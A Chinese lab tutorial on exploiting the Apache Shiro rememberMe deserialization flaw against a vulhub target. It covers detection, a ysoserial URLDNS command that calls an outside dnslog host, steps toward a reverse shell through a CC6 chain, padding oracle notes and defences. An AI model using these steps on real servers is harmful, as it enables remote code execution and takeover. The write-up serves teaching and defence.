官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
1 环境搭建
采用vulhub的shiro环境
# docker-compose up -d
访问8080端口测试是否成功
2 漏洞原理及利用
Shiro是一款开源安全框架,用于身份验证、授权和会话管理
0x01 漏洞探测
在登录时勾选Remember me,burp抓包可以看到,响应包的set-cookie字段存在rememberMe
后续访问时,cookie中携带rememberMe(由于在repeater测试,因此两次抓到的rememberMe不同)
反之,如果不勾选Remember me,则set-cookie时rememberMe=deleteMe
基于此特征,可以大致判断出网站是否使用shiro,是否存在漏洞
0x02 漏洞原理
此处不对源码进行详细分析,具体分析可以看大佬的这篇
服务端在接收到cookie后,会对cookie进行三部操作
检索rememberMe字段
base64解码(从上图中也可以看出rememberMe字段进行了base64编码)
AES解密,shiro默认加密方式,存在padding oracle攻击及密钥泄露,是可以利用的核心
对AES解密出的内容进行反序列化,此处为漏洞成因
0x03 漏洞利用
首先利用URLDNS链判断是否可以利用
URLDNS链从HashMap.readObject方法起始,经过HashMap.Hash->URL.hashCode->URLStreamHandler.hashCode,最终到URLStreamHandler.getHostAddress发送一次解析请求
利用ysoserial生成URLDNS链
$java -jar ysoserial URLDNS 'http://xxx.dnslog.cn'>1.txt
编写脚本对payload进行加密编码(后续放在github上)
删除JSESSIONID(当该字段存在时,不检测rememberMe),修改rememberMe为加密后的值发送
查看dnslog,成功发送请求,证明存在可利用漏洞
生成CC链,再次按照上述方式发送,执行命令为反弹shell(CC6可打通),注意vulhub靶机本身没有nc,如果使用nc需要先上传
3 其他版本反序列化漏洞
shiro721:1.4.2版本以下仍采用CBC加密,但密钥不再硬编码,因此可以使用padding oracle实现攻击
1.4.2+:加密方式变为GCM
4 防御
升级shiro版本
限制rememberMe字段长度